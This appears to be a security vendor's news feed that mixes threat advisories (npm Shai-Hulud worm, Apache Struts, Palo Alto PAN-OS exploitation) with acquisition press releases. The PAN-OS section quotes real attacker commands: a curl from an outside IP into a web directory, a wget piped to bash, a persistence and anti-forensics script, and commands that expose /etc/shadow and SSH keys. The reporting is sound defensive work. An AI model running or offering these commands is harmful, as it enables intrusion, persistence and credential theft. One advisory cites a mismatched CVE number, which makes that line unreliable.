On September 15, 2025, reports surfaced that the widely used npm package @ctrl/tinycolor had been compromised by malware as part of a broader supply chain attack affecting over 180 packages.

Reports surfaced that the widely used npm package @ctrl/tinycolor had been compromised by Wormable Malware as part of a broader supply chain attack affecting over 40 packages initially, with the number rising to more than 180 according to Aikido’s blog. Upon further investigation, the first malicious package that was identified as compromised in this campaign was rxnt-authentication, which was updated on September 14, 2025, at 17:58:50 UTC. 

The malware in this campaign is considered one of the first self-spreading worms to propagate via the npm ecosystem. It harvests sensitive information such as developer credentials, cloud keys, and tokens by scanning infected systems using credential gathering tools such as TruffleHog, exfiltrating the stolen data through public GitHub repositories, and injecting itself into other packages managed by compromised developers, to spread further across the npm ecosystem. 
Updated Cyber Security News can be found here.

Package management ecosystems like npm have been heavily targeted by threat actors recently and will likely continue to be a prime focus for organizations using these tools as part of their development toolchain. The most recent developments follow the September 8, 2025 npm package compromise, in which malicious updates injected cryptocurrency-stealing malware into popular packages, and the August 26, 2025 Nx package compromise, which exfiltrated thousands of developer credentials and led to many private repositories being made public. 

Malware 

From a high level, the Wormable Malware in this campaign carries out a series of actions to steal data and then proceeds to spread itself widely within the npm ecosystem. 

1. First, it scans infected hosts and continuous integration (CI) environments for sensitive secrets like passwords and cloud service credentials by using tools like TruffleHog and querying metadata endpoints from AWS, Google Cloud, and Azure.
2. It then creates a public GitHub repository named “Shai-Hulud,” where it dumps a JSON file containing system details, environment variables, and stolen secrets for threat actors to access. 
3. The malware also drops a malicious GitHub Actions workflow (.github/workflows/shai-hulud-workflow.yml) that collects repository secrets and sends them to attacker-controlled webhooks. 
4. To propagate further, it looks for valid npm tokens it finds and uses them to automatically republish other packages maintained by the compromised user with malicious code. 
5. Finally, it makes private repositories accessible by turning them public or adding workflows and branches that trigger additional leaks and malware runs, effectively acting as a self-replicating worm across the developer ecosystem. 

Affected Code Packages

The npm software registry is the world’s largest package repository, containing more than 800,000 code packages with millions of downloads per day. As it is widely used in development environments, organizations that use npm as part of their development workflow are recommended to review this blog article for a list of affected packages that have been identified so far. 

Recommendations 

Review GitHub Accounts for Malicious Repositories

Considering that this malware is known to change private repositories to public, review your GitHub account for suspicious activities involving the unintended change of private repositories to be public-facing. 

Additionally, look for new repositories with a description of Shai-Hulud Migration or newly-created branches called Shai-Hulud. If you are not using GitHub in your environment but do publish packages to a public or private npm registry, look for new, unsanctioned versions of packages deployed to npm registries. 

Identify and Remove Affected npm Packages

Hijacked npm packages that were identified by their maintainers are being removed from the npm registry to prevent further distribution. It is recommended that organizations review and remove affected versions of npm packages from their environments, especially on devices where npm is used as part of the development pipeline. 

Special care should be taken in any confirmed infection scenario where npm authentication tokens are present for publication of packages to private or public npm registries, considering that this malware attempts to propagate by deploying trojanized versions of packages using those credentials. Where feasible, consider purging and reinstalling all npm packages to ensure no known trojanized dependencies are able to persist. 

Rotate Secrets on Devices Running Trojanized npm Packages

At minimum, any device confirmed to be running trojanized versions of npm packages should be quarantined until fully remediated, and any accessible secrets should be rotated. As a precaution, teams may consider rotating these credentials across development environments where npm packages are regularly installed, even without confirmed compromise. 

Considering that this malware/ Wormable Malware harvests credentials from a wide variety of sources using tools like TruffleHog, various types of secrets should be considered for rotation, which may include those gathered in the recent campaign. 

Potentially affected secrets include, but are not necessarily limited to: 

• AWS credentials, including access keys (e.g., AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY), IAM credentials, and session tokens. 
• Google Cloud Platform service credentials including OAuth tokens and service account keys. 
• Azure credentials including service principals and access tokens. 
• Credentials stored in credential management tools such as AWS Secrets Manager, GCP Secret Manager, and Azure Key Vault. 
• NPM authentication tokens (i.e., those used for automation and publication). 
• API keys stored in environment variables throughout code. 
• SSH keys used with Git. 
• Database credentials stored in connection strings. 
• GitHub personal access tokens. 
• GitHub Actions secrets. 

Note: At the time of this writing, TruffleHog supports over 800 different types of credentials for extraction. While there is no central documentation page listing out all supported credential types, their GitHub repository has a list of detectors provided. 

Monitor for Suspicious Connections

In this campaign, threat actors were observed creating outbound connections to the webhook[.]site as a means of confirming that propagation was successful. If you do not use this service for legitimate purposes in your environment, consider blocking this domain. 

References

• Step Security Research Blog
• Socket Research Blog
• Aikido Research Blog

Resources

Understand the threat landscape with our annual review highlighting cyber threats with the 2025 Security Operations Report. 

See how Arctic Wolf utilizes threat intelligence to harden your attack surface and stop threats earlier and faster.

Arctic Wolf has recently observed customers receiving unsolicited Microsoft MFA (multi-factor authentication) text messages.

Arctic Wolf has recently observed customers receiving unsolicited Microsoft MFA (multi-factor authentication) text messages. These messages originate from legitimate Microsoft short code numbers; however, the source and intent have not been confirmed. This issue appears widespread, affecting organizations across multiple industry verticals.  

Example of Text Message

It is currently unclear whether this activity is due to a systemic issue on Microsoft’s side or part of a malicious campaign. At this time, Arctic Wolf has not identified any malicious activity or unauthorized access associated with these unexpected Microsoft MFA prompts. 

Recommendation 

Avoid Interacting With Unsolicited Microsoft MFA or other MFA Authentication Messages

Avoid interacting with any unsolicited MFA requests and report them to your security team. 

Resources

Understand the threat landscape, and how to better defend your organization, with the 2025 Arctic Wolf Threat Report

See how Arctic Wolf utilizes threat intelligence to harden your attack surface and stop threats earlier and faster

Explore how our multi-faceted team of experienced technical investigators handles every part of the IR process, from digital forensics to threat actor negotiation.

Arctic Wolf 2025 Threat Report : 96 Percent of Ransomware Cases Included Data Theft as Cybercriminals Double Down on Extortion

Arctic Wolf, a global leader in security operations, today released its annual Arctic Wolf 2025 Threat Report, offering an in-depth analysis of the evolving cyber threat landscape. This year’s findings underscore how cybercriminals are adapting their methods to bypass stronger security defenses—prioritizing data theft, refining business email compromise (BEC) scams, and exploiting known vulnerabilities to infiltrate organizations worldwide.

New research reveals evolving threat tactics, the rising role of business email compromise, and the importance of proactive security measures. This extensive report takes a deep dive into the types of cyber attacks Arctic Wolf® Incident Response investigated this year, why certain industries are targeted with certain kinds of tactics, techniques, and procedures (TTPs), and what organizations around the globe can do to harden their defenses in this changing threat landscape.

Leveraging insights from Arctic Wolf’s incident response (IR) engagements, threat intelligence research, and telemetry from the Arctic Wolf Aurora Platform, the report provides a detailed examination of the tactics, techniques, and procedures (TTPs) attackers are using to outmaneuver traditional defenses. It also offers actionable recommendations for organizations looking to enhance their cybersecurity resilience, taking advantage of the report’s description of the current threat landscape.

“The 2025 Arctic Wolf Threat Report highlights a critical shift in cybercriminal behavior: data exfiltration has become the norm, not the exception,” said Kerri Shafer-Page, vice president of incident response, Arctic Wolf. “Threat actors are no longer just locking up data with ransomware; they’re stealing it first to maximize pressure on victims. The insights help organizations understand the risks they face today and shape the advanced detection and response strategies embedded within the Arctic Wolf Aurora Platform to keep our customers secure.”

Key findings from the Arctic Wolf 2025 Threat Report include:

• Steal first, extort second. As organizations improve their ability to recover from ransomware, cybercriminals have turned to data exfiltration to increase leverage—96% of ransomware cases analyzed included data theft.
• The cybercrime trifecta. Three types of cybersecurity incidents account for 95% of all incident response (IR) cases: ransomware 44%, business email compromise (BEC) 27%, and intrusions 24%.
• Threat actors follow the money. BEC continues to grow as a preferred tactic, particularly in the finance and insurance sector, where it accounted for 53% of IR cases—making it the only industry where BEC outpaced ransomware.
• Patch or pay. In 76% of intrusion cases, attackers exploited just 10 specific vulnerabilities—none of which were zero-days, and most linked to remote access tools and externally facing services. This reinforces the need for proactive patch management.
• Ransomware’s price tag: $600K. Median ransom demands remain high at $600,000 USD, demonstrating that ransomware remains a lucrative business for cybercriminals despite increased law enforcement action.
• Never split the difference. The Arctic Wolf Incident Response Team helped reduce aggregate ransom demands by 64%, and 70% of clients using Arctic Wolf’s negotiation services avoided paying ransoms altogether.

The Arctic Wolf 2025 Threat Report brings together Arctic Wolf’s top security minds—from incident responders and researchers to data scientists and engineers—to provide a comprehensive analysis of today’s evolving cyber threat landscape. This essential resource helps security, IT, and business leaders anticipate threats, strengthen defenses, and stay ahead of adversaries. Powered by insights from the Arctic Wolf Aurora Platform and backed by security operations expertise from one of the world’s largest commercial Security Operations Centers (SOCs), Arctic Wolf delivers the intelligence and defense organizations need to proactively detect, respond to, and remediate cyber threats.

For additional insights and to download the full Arctic Wolf 2025 Threat Report, visit arcticwolf.com.

Citrix, a business unit of Cloud Software Group, Inc., has announced the strategic acquisition of Unicon GmbH, a Citrix Ready partner and provider of the secure endpoint operating system (OS), eLux^Ⓡ, along with the enterprise management platform, Scout.

With the acquisition of Unicon, Citrix will provide customers with a secure client OS and endpoint management that dramatically improves endpoint security, resiliency and operational costs, while providing a seamless end-to-end experience for access to corporate applications and desktops. In addition, enterprise customers can leverage eLux to extend the life of their current assets as they look to the upcoming Windows 10 end of support.

“The hybrid work model embraced by countless companies today brings tremendous opportunities for employees, as well as challenges for IT teams who must balance security, performance, scalability, and cost savings,” said Sridhar Mullapudi, co-president of Citrix. “Our acquisition of Unicon will enable our customers to maximize the value of their endpoints, giving users secure access to the Citrix platform without the need for additional software purchases. We are proud to welcome Unicon to the Citrix family and look forward to supporting today’s evolving workforce.”

Key benefits include:

• Enhanced user experience: pairing Unicon’s hybrid client solutions with Citrix’s virtual desktop and application delivery solutions enhances user experiences in hybrid work scenarios, providing seamless, secure access across diverse environments.
• New use cases: by integrating additional platform technologies such as CitrixⓇ Enterprise Browser and Strong Network into eLux, customers can provide access to next generation Progressive Web Apps (PWAs) and browser-based applications with a native end-user experience and no additional software. They can even expand to new personas, such as developers.
• Robust endpoint management: part of the Unicon portfolio, Scout along with Scout Cloud Gateway provide a robust endpoint management solution for devices running eLux. With these management products together, companies can quickly and securely manage endpoints devices in remote environments. This means seamless integration with the entire Citrix platform, providing customers with seamless and secure access to Virtual Desktops (VDI), Desktop-as-a-Service (DaaS), and web applications across on-premises, hybrid, and cloud environments.
• Consolidation with increased value: including an endpoint OS within the Citrix platform greatly expands the value for customers, enabling the repurposing of devices to access VDIs on-premises or in the Cloud, or SaaS-based services. Ideal for workforces in healthcare, finance and other task workers, this integration enables customers to consume Windows 365 or AWS Workspaces Core supported by the best, most secure experience in the industry and without the need to purchase an additional endpoint OS license. We plan to include Unicon in our core offerings, the Citrix Platform License and the Universal Hybrid Multi-Cloud License.

Proven Solutions for Global Organizations

Founded in Germany over 30 years ago, Unicon’s eLux OS is deployed to more than 2.5 million endpoint devices across 65+ countries, including large-scale customers with fleets of 300,000+ endpoint devices. 

Unicon’s eLux OS and Scout management platform help organizations repurpose existing devices, reduce hardware waste, and support green IT initiatives, offering a seamless and cost-effective experience:

• eLux provides endpoint security, supports device repurposing, and aligns with green IT goals.
• Scout centralizes IT operations, simplifying application deployment and empowering IT teams to manage endpoints through a single interface

Maximizing Value with Citrix and Unicon Integration

The technology partnership between Citrix and Unicon has been in place since 2001. eLux is seamlessly integrated with Citrix^Ⓡ technologies like Virtual Apps and Desktops (VDI), Desktop-as-a-Service (DaaS), and the Citrix^Ⓡ Enterprise Browser. This integration ensures a secure and high-performance user experience. Customers can repurpose existing devices to access VDIs on-premises or in the cloud, as well as SaaS services, in a more cost-effective way.

Driving Innovation and Sustainability

Citrix’s acquisition of Unicon follows its recent purchases of deviceTRUST and Strong Network, reinforcing its commitment to zero-trust security and hybrid work models. Together, Citrix and Unicon are addressing the needs of industries such as finance, public sectors, and healthcare by offering:

• Cost-effective endpoint management with no additional OS license requirements. 
• Enhanced sustainability by extending the lifecycle of existing devices.
• Scalable solutions that support hybrid work environments.

“Unicon’s solutions, combined with Citrix’s platform, create a powerful synergy for hybrid work,” said Philipp Benkler, former CEO of Unicon and now Vice President of Product at Citrix. “By joining Citrix, we are helping businesses achieve secure, future-ready IT strategies.”

A Unified Vision for the Future

Together, Citrix and Unicon are redefining hybrid work environments, offering secure, scalable, and sustainable solutions to meet the needs of today’s enterprises.

“With eLux and Scout as part of our platform, Citrix is delivering a comprehensive solution for organizations seeking to enhance security, reduce costs, and embrace sustainable IT practices,” said Citrix’s Mullapudi.

On December 15, 2024, reports emerged that threat actors have begun attempting to exploit a recently disclosed critical vulnerability in Apache Struts (CVE-2024-53677) shortly after the publication of a Proof-of-Concept (PoC) exploit. 

Apache Struts is a widely used open-source web application framework for developing Java-based applications. CVE-2024-53677 is a file upload path traversal vulnerability in Struts that allows attackers to upload files to restricted directories, potentially leading to Remote Code Execution (RCE) if a webshell is uploaded and exposed in the web root. The fix for this vulnerability was released on December 10th. 

Apache Struts has been an attractive target for threat actors, as evidenced by several RCE vulnerabilities affecting Apache Struts being listed in CISA’s Known Exploited Vulnerabilities Catalog. Threat actors may target CVE-2024-53677 in the near term due to the publicly accessible PoC, which lowers the barrier to exploitation. Exploitation attempts have quickly followed PoC releases, as demonstrated by the surge in attempts after the publication of PoC exploit code for CVE-2024-0012 and CVE-2024-9474 in Palo Alto Networks PAN-OS in November. 

Recommendations for CVE-2024-53677

Upgrade to Latest Fixed Version

Where feasible, Arctic Wolf strongly recommends upgrading Apache Struts to the latest version. 

This update is not backward compatible, meaning you must modify the code in your application(s) responsible for handling user actions, such as file uploads, to use the new Action File Upload mechanism and its associated interceptor. Continuing to use the old file upload mechanism will leave your application vulnerable to this attack. 

Please follow your organization’s patching and testing guidelines to minimize potential operational impact. 

Closely Monitor Software Vendor Patch Advisories Related to CVE-2024-53677

While Apache has released a fix for CVE-2024-53677, the security patch is not automatically applied to software products that use the framework. The best method for remediating CVE-2023-50164 in third-party software products is to apply the official security updates from the vendor of each affected software product. 

Learn more here

Arctic Wolf® and BlackBerry Limited (NYSE: BB; TSX:BB), two global leaders in security software and services, has announced they have entered into a definitive agreement for Arctic Wolf to acquire BlackBerry’s Cylance endpoint security assets. Cylance is the pioneer of AI-based endpoint protection trusted by thousands of organizations around the world. With this acquisition, Arctic Wolf ushers in a new era of simplicity, flexibility, and outcomes to the endpoint security market, delivering the security operations results customers have been asking for.

Under the terms of the agreement, BlackBerry will sell its Cylance endpoint security assets to Arctic Wolf for $160 million of cash, subject to certain adjustments, and approximately 5.5 million common shares of Arctic Wolf. After allowing for the purchase price adjustments, BlackBerry will receive approximately $80 million of cash at closing and approximately $40 million of cash one year following the closing.

The proposed transaction is subject to customary closing conditions and is expected to close in BlackBerry’s fourth fiscal quarter.

Arctic Wolf is a leader in AI-powered security operations, delivering its solutions from a single open platform to meet customers’ needs for effective, comprehensive, and reliable security outcomes. With the addition of Cylance’s trailblazing suite of Cylance endpoint security capabilities and enhanced AI functionality, Arctic Wolf will bolster its position as a market-leading platform provider, offering coverage from the endpoint to the edge.

As many organizations are looking to consolidate an increasing number of disparate security tools, there is a rapidly growing demand for end-to-end platforms.

“Security has an operations and effectiveness problem and endpoint solutions alone have failed to live up to the outcomes they have promised for years,” said Nick Schneider, president and chief executive officer, Arctic Wolf. “By incorporating Cylance endpoint security capabilities into our open-XDR Aurora platform, we will be addressing a rampant need for a truly unified, effective security operations that delivers better outcomes for customers. We believe we will be able to rapidly eliminate alert fatigue, reduce total risk exposure, and help customers unlock further value with our warranty and insurability programs.”

“I am incredibly excited to partner with Arctic Wolf through this agreement,” said John Giamatteo, chief executive officer of BlackBerry. “We see this transaction as a win-win for our shareholders and all other stakeholders. Our customers will realize the benefits of continuity of service and the expertise that a global cybersecurity leader like Arctic Wolf provides. Arctic Wolf benefits by adding Cylance’s endpoint security solutions to its native platform. Finally, as Arctic Wolf leverages its scale to build upon and grow the Cylance business, BlackBerry will benefit as a reseller of the portfolio to our large government customers and as a shareholder of the company.”

There will be no impact to BlackBerry’s Secure Communications portfolio of businesses, which include BlackBerry® UEM, BlackBerry® AtHoc® and BlackBerry® SecuSUITE®. The Secure Communications business will remain an integral part of the BlackBerry portfolio.

Redefining the Modern Security Platform for Customers and Partners

With the addition of a native Cylance endpoint security solution to its portfolio, Arctic Wolf is building one of the largest open XDR security platforms in the industry, enabling customers and partners to have the option to leverage more than 15 supported endpoint solutions. Arctic Wolf is currently the only security operations leader offering this type of optionality, which combined with its comprehensive approach to minimizing risk through security operations, makes it uniquely positioned to drive value for customers of all sizes and security maturity.

Cylance has a long history of recognition as a market leader, known for stopping 98% of attacks before they begin and trusted by many of the world’s leading organizations for its AI-driven prevention and detection. Recently, Cylance was named 2024 Customers’ Choice for endpoint protection platforms (EPP) by Gartner® Peer Insights for the second consecutive year. By integrating Cylance into its portfolio, Arctic Wolf will provide a world-class endpoint protection solution that rivals the best in the industry, complementing its endpoint offering with one of the largest commercial SOCs in the world that delivers unified security operations and comprehensive attack surface coverage.

“Organizations are looking to unify tools and operations via a single platform that can effectively analyze and respond to security threats, drive consistent security outcomes, and demonstrably minimize risk,” said Dan Schiappa, chief product and services officer, Arctic Wolf. “In the past, this has been a near-impossible, costly goal for resource-constrained leaders. By adding endpoint security to our platform, we will be delivering the security outcomes organizations want in one, frictionless operational platform to go toe-to-toe with today’s advanced threats, while maintaining our commitment to customers and partners leveraging other endpoint solutions.”

Perella Weinberg Partners LP served as exclusive financial adviser to BlackBerry and Morrison Foerster LLP served as legal adviser to BlackBerry. Cooley LLP served as legal adviser to Arctic Wolf.

Join BlackBerry’s CEO and CFO today, Monday, December 16, at 5:30 p.m. ET for more information on today’s announcement.   The call, which will be live streamed to the general public, can be accessed using the following link (here), through the Company’s investor webpage (BlackBerry.com/Investors), or by dialing toll free +1 (844) 763-8275 and entering Elite Entry Number 51772.  A replay will be available at approximately 8:30 p.m. ET today, using the same webcast link (here) or by dialing toll free +1 (877) 481-4010 and entering Replay Access Code 51772.

Read more about Arctic Wolf’s intent to acquire Cylance in a blog post from Arctic Wolf’s Chief Product and Services Officer, Dan Schiappa.

Citrix acquires deviceTRUST and Strong Network. Through the acquisitions of deviceTRUST and Strong Network, Citrix customers will gain real-time protection for VDI and DaaS users, secure cloud development environments for developers, and expanded capability to protect access to all applications and data in hybrid environments with Citrix Secure Private Access.

With the widespread adoption of hybrid work models, where teams operate across geographical regions on managed and unmanaged devices, every connection and endpoint presents a potential security risk. Addressing this challenge, Citrix, a business unit of Cloud Software Group Inc., today announced the strategic acquisitions of deviceTRUST GmbH and strong.network SA.

Building on its commitment to strengthen security throughout its solutions, these acquisitions expand the security capabilities of the Citrix^Ⓡ platform, enabling it to isolate and protect access to mission-critical applications deployed across on-premises and cloud environments while ensuring access for developers to cloud development environments.  With these new additions, Citrix is empowering companies to simplify zero-trust access to meet diverse user needs in hybrid application deployments while reducing the risk of data loss.

“As businesses continue to evolve to support hybrid work, the demand for cyber resilience has only intensified,” said Sridhar Mullapudi, executive vice president and general manager, Citrix. “We are proud to welcome the deviceTRUST and Strong Network teams to the Citrix family. By integrating their secure access technologies into the Citrix platform, we’re providing greater value for our customers and helping them meet the diverse needs of their users.”

Elevating zero-trust security

The deviceTRUST^Ⓡ technology introduces a new layer of control, enabling real-time contextual access for VDI and DaaS environments. This capability allows organizations to monitor and respond to changes in device posture and user location, strengthening data security, managing application access, and reducing endpoint risk. By continuously assessing device attestation, the Citrix platform enables IT leaders to grant or revoke access based on real-time security conditions, offering organizations greater control over their network access.

Securing and accelerating developer workflows

The Strong Network platform’s secure cloud development environments help businesses build, launch, and access mission-critical applications more efficiently and cost-effectively. Strong Network protects against data breaches with features like data loss prevention and patented data infiltration detection, which guard against phishing, malware, and credential theft. Designed for BYOD setups, the Strong Network platform’s secure cloud development environments also ensure compliance with security standards such as NIST and ISO, while providing clear visibility and control throughout the application lifecycle.

Expanding secure access to hybrid deployments

In addition to these acquisitions, Citrix is also expanding support for Citrix^Ⓡ Secure Private Access in hybrid environments, providing customers with the simplicity of cloud management with the resiliency of an on-premises data plane.  With Citrix Secure Private Access, businesses can manage secure access to applications across on-premises and cloud environments, extending zero-trust access controls to web and SaaS applications, virtual desktops, and traditional client/server applications—uniquely bridging security and usability across all application types.

Beyond these acquisitions, Citrix is strengthening our commitment to secure hybrid work by expanding Citrix Secure Private Access (SPA). SPA provides the simplicity of cloud management with the strength of an on-premises data plane, allowing businesses to manage access to applications across on-premises and cloud environments seamlessly. Citrix Secure Private Access extends zero trust security to all applications, including web, SaaS, virtual desktops, and traditional client/server applications, ensuring both robust security and a smooth end-user experience.
With the addition of deviceTRUST and Strong Network, Citrix has underscored its dedication to providing comprehensive security solutions that enable organizations to embrace hybrid work while safeguarding critical assets. By continuously evolving the Citrix platform to meet the demands for flexibility, security, and collaboration in the modern workforce, Citrix remains a leader in secure digital workspace solutions.

To help with any of your questions we’ve pulled together a list of FAQs. You can also visit our Citrix security page where we will continue to share more.

In this demo, we will see how Arctic Wolf’s unified portal reflects the status of Security Focuses and the availability of Security Reviews to help customers monitor and plan the advancement of their security journey.

The Arctic Wolf analyst team is known for their 24×7 monitoring and concierge level service. In this video we’ll explore a few of the response actions the SOC team has at their disposal to take action and mitigate impact during a cyber security incident.

Arctic Wolf Observes Ongoing Exploitation of Critical Palo Alto Networks Vulnerability CVE-2024-0012 Chained with CVE-2024-9474

On November 19, 2024, Arctic Wolf began observing active exploitation of the recently-disclosed CVE-2024-0012 and CVE-2024-9474 vulnerabilities impacting Palo Alto Networks PAN-OS software. When chained together, these vulnerabilities allow an unauthenticated threat actor with network access to the management web interface to gain administrator privileges. Exploitation could enable threat actors to perform administrative actions, modify configurations, or leverage other authenticated privilege escalation vulnerabilities. Since our last bulletin regarding these vulnerabilities, the following has occurred: 

• We have detected exploitation of CVE-2024-9474 chained with CVE-2024-0012 in customer environments. While CVE-2024-9474 is classified as a medium-severity vulnerability on its own, exploiting CVE-2024-0012 allows a threat actor to bypass authentication and gain PAN-OS administrator access to the management web interface, allowing them to escalate privileges and perform actions on the firewall with root privileges. 
• Upon successful exploitation, we have observed threat actors attempting to transfer tools into the environment and exfiltrate config files from the compromised devices. 
• On November 19, 2024, new technical details of CVE-2024-0012 and CVE-2024-9474 were publicly disclosed by WatchTowr, which included Proof-of-Concept (PoC) exploit code. 
• PAN has further specified that CVE-2024-0012 only affects PA-Series, VM-Series, and CN-Series firewalls running PAN-OS versions 10.2, 11.0, 11.1, and 11.2, as well as Panorama (virtual and M-Series) and WildFire appliances. 
• In addition to identical impacted products, CVE-2024-9474 impacts PAN-OS 10.1. 

Arctic Wolf assesses with high confidence that threat actors will continue targeting this vulnerability due to a PoC exploit being made available publicly, which lowers the barrier to exploitation. Additionally, publicly exposed firewalls are an attractive target due to the risk of exfiltrating sensitive data and conducting further lateral movement in compromised environments. Earlier this year when threat actors exploited GlobalProtect, Palo Alto Networks devices were shown to be an attractive target to threat actors. 

Learn more here

What We Know About the Intrusions

Exploitation Details

Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin mass exploitation using the available technical details.

With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the most recent watchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:

1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME

Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.

• watchTowr.js
• watchTowr.php
• watchTowr.txt
• CVE20249474.php

Command and Control

Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.

Several commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One notable example is an instance where Sliver C2 was retrieved, an open-source alternative to the commonly used Cobalt Strike penetration testing tool.

wget --no-check-certificate -qO-https://104.131.69.106/vicidial/vicidial_sign.js|bash

The contents of the script (vicidial_sign.js) shown below has several key functions:

• Curl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and saves it to the /usr/lib/e_nas directory. If curl fails, it attempts to use wget instead.
• The touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory to match that of /usr/lib/php.ini, likely to hide the recent modification to the file.
• Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.
• The script then checks if a process named cloud-lib is running (psgrep -x cloud_lib), and if not, it copies, /usr/lib/e_nas to the /usr/bin/cloud-lib directory, setting its permission to executable only by owner (chmod 700), then proceeds to run it in the background.
• The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.
• The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.
• Bash history is cleared to avoid evidence of the commands having been executed.

#!/bin/bash
curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas
touch -r  /usr/lib/php.ini /usr/lib/e_nas
echo '' > /etc/cron.hourly/telemetry.cron
echo '#!/bin/sh' > /etc/cron.hourly/telemetry.cron
echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib &&  chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'" >> /etc/cron.hourly/telemetry.cron
chmod 755 /etc/cron.hourly/telemetry.cron 
touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron
echo "" > /root/.bash_history

The file (up.js) outlined in the section above is a UPX-packed Sliver payload.

Data Exfiltration

In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most exfiltration data included firewall configuration files which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate operating system passwd and shadow files.

Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:

cat /root/.ssh/authorized_keys > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’
cat /etc/networks > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’
arp -a > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’
cat /etc/passwd > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’
cat /etc/shadow > /var/appweb/htdocs/unauth/watchTowr.txt’

In some instances, threat actors archived the output of these files using the tar command:

tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
    

PHP Webshell

One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:

1. When a HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.
2. Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.
3. The output is base64 encoded and XOR encrypted, and is padded with a header of the first 8 bytes consisting of the md5sum of 18f566d952acaa29, and with a footer of the last 8 bytes consisting of the md5sum of 18f566d952acaa29.

Learn more here

Citrix, a business unit of Cloud Software Group, Inc., announced the general availability of Citrix DaaS for Amazon WorkSpaces Core from Amazon Web Services (AWS). This innovative solution leverages the strengths of Citrix DaaS with AWS’s managed virtual desktop infrastructure (VDI) service, Amazon WorkSpaces Core, offering businesses a secure, high-performing, and economically effective way to deliver virtual desktops and applications to users, including support for Microsoft 365 Apps for enterprise, regardless of location or device.

We’re excited to expand our relationship with AWS through Citrix DaaS for Amazon WorkSpaces Core,” said Sridhar Mullapudi, General Manager of Citrix. “This integration harnesses the power of both platforms, providing our customers with a robust, adaptable, and secure solution for virtual desktop delivery. By working with AWS, we are empowering businesses to streamline IT operations and enhance user experiences across the board.”

With the release of Citrix DaaS for Amazon WorkSpaces Core, organizations can now manage their combined Citrix and Amazon WorkSpaces Core environments more effectively, benefiting from a unified management experience. This solution introduces new capabilities, including flexible compute pricing models, seamless support for Microsoft 365 Apps for enterprise, and enhanced security features such as encrypted disk support.

“Our relationship with AWS is about driving value for our customers by offering scalable and secure virtual desktop solutions that meet their evolving needs,” said Hector Lima, Chief Revenue Officer for Citrix. “With Citrix DaaS for Amazon WorkSpaces Core, businesses can benefit from a streamlined desktop delivery solution that supports their growth and cloud adoption goal.”

Key Features and Benefits:

• Fixed Compute Pricing: Citrix DaaS for Amazon WorkSpaces Core offers a fixed-price model designed to optimize IT budgets. Additionally, organizations can take advantage of discounts with the AWS Enterprise Discount Program (EDP) when utilizing the full suite of Citrix and AWS offerings. Citrix customers with Universal Hybrid Multi-Cloud (UHMC) or Citrix Platform License (CPL) can take full advantage of deployments on Amazon WorkSpaces Core as a part of their Citrix^Ⓡ product entitlements.
• Productivity App Integration: The solution supports Microsoft 365 Apps for enterprise, as well as Windows Server and Windows Desktop operating systems on dedicated instances. Businesses already using these systems can deploy their applications on Amazon WorkSpaces Core, at no additional cost depending on their existing licenses. This integration ensures secure and efficient application delivery across all devices, maximizing the value of existing IT investments.
• Automation with Terraform: For customers favoring infrastructure-as-code, the Citrix^Ⓡ Terraform Provider allows for automated deployments, creating necessary resources through Citrix DaaS APIs. This enables efficient scaling and management of virtual desktop environments.
• Support for Single Session and Encrypted Disks: Citrix DaaS for Amazon WorkSpaces Core provides support for Windows Server 2019 and 2022 single session instances and adds encrypted disk support, providing greater flexibility and an extra layer of security for deployments.

“Citrix DaaS for Amazon WorkSpaces Core sets a new standard for our customers in delivering secure, consistent virtual desktop access, no matter where their users are,” said Alex Duncan, VP Digital Workspace at Presidio, a Citrix Platinum Partner. “The solution helps IT teams deploy Office 365 apps in AWS and achieve greater efficiency and control over resources, while strengthening the overall user experience over the native AWS Workspaces solution.” 

Learn more about how Citrix DaaS for Amazon WorkSpaces Core can help transform your virtual desktop delivery by visiting our page.

